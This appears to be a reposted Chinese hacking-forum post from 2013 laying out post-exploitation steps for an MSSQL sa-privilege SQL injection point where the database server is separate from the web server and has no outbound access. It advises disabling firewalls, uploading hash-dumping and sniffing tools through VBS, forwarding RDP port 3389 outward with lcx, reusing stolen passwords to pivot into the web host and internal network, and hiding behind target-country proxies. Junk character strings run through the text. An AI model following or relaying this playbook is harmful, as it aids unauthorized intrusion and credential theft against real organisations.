当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。8 J- r. c$ v/ p
6 V$ s5 i' e$ ~' x, l8 d
! J4 v( q1 o* P; p6 e! g4 O5 N0 X
8 S5 J/ F" c" K) a; \% l4 C* TSA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)8 w' O+ H- [& o* a5 i* f6 Z
) f. Y3 x) R+ B/ d9 C
& R8 g$ y- E9 j! l& [. q
一、DB机有公网IP.
$ c) O/ P, g9 F, t7 I. ?, a# g2 ~5 s; G) [# Q! _
1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.
0 ~0 C' Y- m' v6 J6 F, h) q# h
% t7 m0 e, X$ S
- Y, n; K4 R' i! Y2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.
1 V, \' a( A4 o: U3 @5 G9 S o# u; @8 `2 e
6 C6 c6 w4 l) B! c/ |8 @
3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com
& Y, P& j1 A9 h7 l( N% W
7 T- i4 N7 A4 B/ i$ t' m/ j4 o8 j0 a& i
4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.
1 c: r1 K# i. q( ?' }" Y# C# U
: P! x2 E1 p7 s& ]+ B; T7 w+ p: F. y7 f: P
7 |9 ]$ N& S8 z# C: e2 X二、DB机只有内网IP6 m i! N1 J( ~$ d& I
: I; g$ Z. {1 a- l. ^1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.+ g2 k. [! D0 m4 G- K K
$ e" }6 F8 Z8 X* s& A
& c6 o* T1 u& s6 s
2:停掉防火墙和IP策略再从内往外扫描.6 r6 n$ ?4 |1 H) [ D+ m
7 T7 h2 Q9 \$ J. w/ u9 ^# j1 f! I2 L# F7 d3 \8 Y) V
3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.7 r- k% F7 o0 R$ S: ?1 C8 ?% y9 T! s
$ d1 s/ l! K! C: j( u# I6 m) j. D2 M7 Y5 m4 q1 ~$ X0 P1 V" B
4:学会密码规律分析往往会有惊喜.
6 w4 K! E( W( D9 k3 ] \ {6 t
% c1 I+ e* I% p; U
5 k7 y8 i' D- ^: `* U9 o X) u; ]3 H5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等
: ? y( c: u) |( n; k! }2 H1 y* ~. B' Y/ c4 q3 f8 {
* ^* |0 Y) [7 Z
有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |
发表于 2013-2-16 21:46:01
收藏
支持
反对